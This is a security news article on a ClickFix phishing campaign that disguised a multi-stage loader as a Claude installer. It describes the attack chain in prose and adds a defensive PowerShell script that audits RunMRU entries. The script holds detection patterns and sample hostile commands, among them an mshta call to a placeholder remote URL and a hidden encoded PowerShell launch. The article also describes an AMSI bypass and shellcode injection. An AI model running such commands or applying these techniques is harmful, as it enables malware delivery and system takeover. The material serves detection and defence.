ClickFix Phishing Campaign Masquerades as Claude AI Installer to Target EU and US Organizations
Rapid7 has uncovered a ClickFix phishing campaign that uses a fake installer for the AI tool Claude to deliver a multi-stage payload targeting organizations in the EU and US.

Rapid7 has detailed a ClickFix phishing campaign that masquerades as an installer for the popular AI tool Claude, targeting organizations in the European Union and the United States. The campaign, detected and blocked by Rapid7's Managed Detection and Response (MDR) service, uses a multi-stage attack chain that begins with the execution of mshta.exe via the Windows run utility. The malicious URL, download-version[.]1-5-8[.]com/claude.msixbundle, was designed to impersonate an MSIX bundle for Claude, a tactic that leverages the growing interest in AI tools to trick users into executing the payload.
The attack chain starts with an HTA file embedded within a ZIP archive disguised as an MSIX bundle. The HTA contains obfuscated VBScript that, when deobfuscated, crafts and executes a PowerShell staging payload. This staging payload generates an MD5 hash of the COMPUTERNAME and USERNAME environment variables and uses the first 16 characters of that hash to construct the URL from which a second-stage PowerShell script is fetched. The script also includes a routine that overwrites the amsiContext field in System.Management.Automation.AmsiUtils, effectively bypassing AMSI (Antimalware Scan Interface) to evade detection.
The second-stage PowerShell script is highly obfuscated and contains a large byte array that, after base64 decoding and deobfuscation, reveals another PowerShell ScriptBlock. This ScriptBlock ultimately performs a process injection routine using .NET interoperability. The code includes a byte array of encrypted shellcode that is decrypted with an XOR routine, then uses native Windows API calls such as NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtCreateThreadEx to inject the shellcode into a legitimate process, granting the attacker full control over the compromised system.
The campaign was detected on April 9, 2026, when Rapid7's detection rule "Attacker Technique - Remote Payload Execution via Run Utility (shell32.dll)" triggered an alert for mshta execution on a customer asset. The rule monitors the RunMRU registry key, which tracks the last 26 commands executed by the Windows run utility, a common vector for ClickFix attacks. Rapid7's SOC analysts were able to respond quickly, preventing further compromise across affected customers.
At the time of discovery, the campaign had very little traction on VirusTotal or within the broader security landscape, indicating that it was a targeted and relatively new threat. The malicious host was taken down before Rapid7 could obtain the original payload, but a copy was available on VirusTotal for analysis. The campaign highlights the continued effectiveness of ClickFix techniques, which rely on social engineering to trick users into executing malicious commands via the Windows run dialog.
Rapid7's analysis underscores the importance of robust detection rules and MDR services in identifying and mitigating such threats. The company emphasized that ClickFix campaigns remain a common and effective attack vector, and that organizations should implement monitoring for suspicious mshta executions and RunMRU registry key modifications. The use of a fake Claude installer also demonstrates how threat actors are capitalizing on the popularity of AI tools to increase the credibility of their lures.
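As an added illustration of the RunMRU monitoring described above and recommended here (example code written for this article, not Rapid7's detection rule), the following PowerShell audits the current user's RunMRU key for Run-dialog commands that launch mshta, reference a remote URL, or pass encoded PowerShell. The detection patterns and the constructed sample entries are assumptions; the sample URL is a placeholder, not a live indicator.

```powershell
# Added example: audit the Run dialog history (RunMRU) for ClickFix-style commands.
# Not Rapid7's rule; detection patterns and sample data below are assumptions.
$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

function Test-RunMruCommand {
    # Returns the reasons a single Run-dialog command looks suspicious (none if clean).
    param([Parameter(Mandatory)][string]$Command)
    $reasons = @()
    if ($Command -match '\bmshta(\.exe)?\b') { $reasons += 'mshta launcher' }
    if ($Command -match '\bhttps?://')        { $reasons += 'remote URL' }
    if ($Command -match '\b(powershell|pwsh)\b.*\s-e(nc(odedcommand)?)?\b') {
        $reasons += 'encoded PowerShell'
    }
    return $reasons
}

function Get-RunMruEntries {
    # Reads RunMRU in most-recent-first order (the MRUList value) and strips the
    # trailing "\1" marker the Run dialog appends to every stored command.
    param([string]$Path = $RunMruPath)
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $key   = Get-Item -LiteralPath $Path
    $order = [string]$key.GetValue('MRUList')
    foreach ($slot in $order.ToCharArray()) {
        $raw = [string]$key.GetValue([string]$slot)
        if ($raw) {
            [pscustomobject]@{ Slot = [string]$slot; Command = ($raw -replace '\\1$', '') }
        }
    }
}

function Find-SuspiciousRunMru {
    # Flags entries matching the patterns above; defaults to the live RunMRU key.
    param([object[]]$Entries = @(Get-RunMruEntries))
    foreach ($e in $Entries) {
        $reasons = @(Test-RunMruCommand -Command $e.Command)
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Slot = $e.Slot; Command = $e.Command; Reasons = ($reasons -join ', ') }
        }
    }
}

# Constructed sample entries (most recent first) mimicking the lure in the article.
# example.invalid is a placeholder host, not the campaign's infrastructure.
$sample = @(
    [pscustomobject]@{ Slot = 'c'; Command = 'mshta https://example.invalid/claude.msixbundle' }
    [pscustomobject]@{ Slot = 'b'; Command = 'notepad' }
    [pscustomobject]@{ Slot = 'a'; Command = 'powershell -nop -w hidden -enc SQBFAFgA' }
)
Find-SuspiciousRunMru -Entries $sample | Format-Table -AutoSize
# On a live Windows host, run Find-SuspiciousRunMru with no arguments to audit HKCU.
```

Because RunMRU is per user and only keeps a short history, this is a triage aid after an alert; continuous coverage still needs process-creation or registry-change telemetry such as the MDR rule described above.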
This campaign serves as a reminder that even as AI tools become more integrated into daily workflows, they also present new opportunities for social engineering. Organizations should educate users about the risks of downloading software from untrusted sources and ensure that security solutions are configured to detect and block multi-stage attack chains like the one described by Rapid7.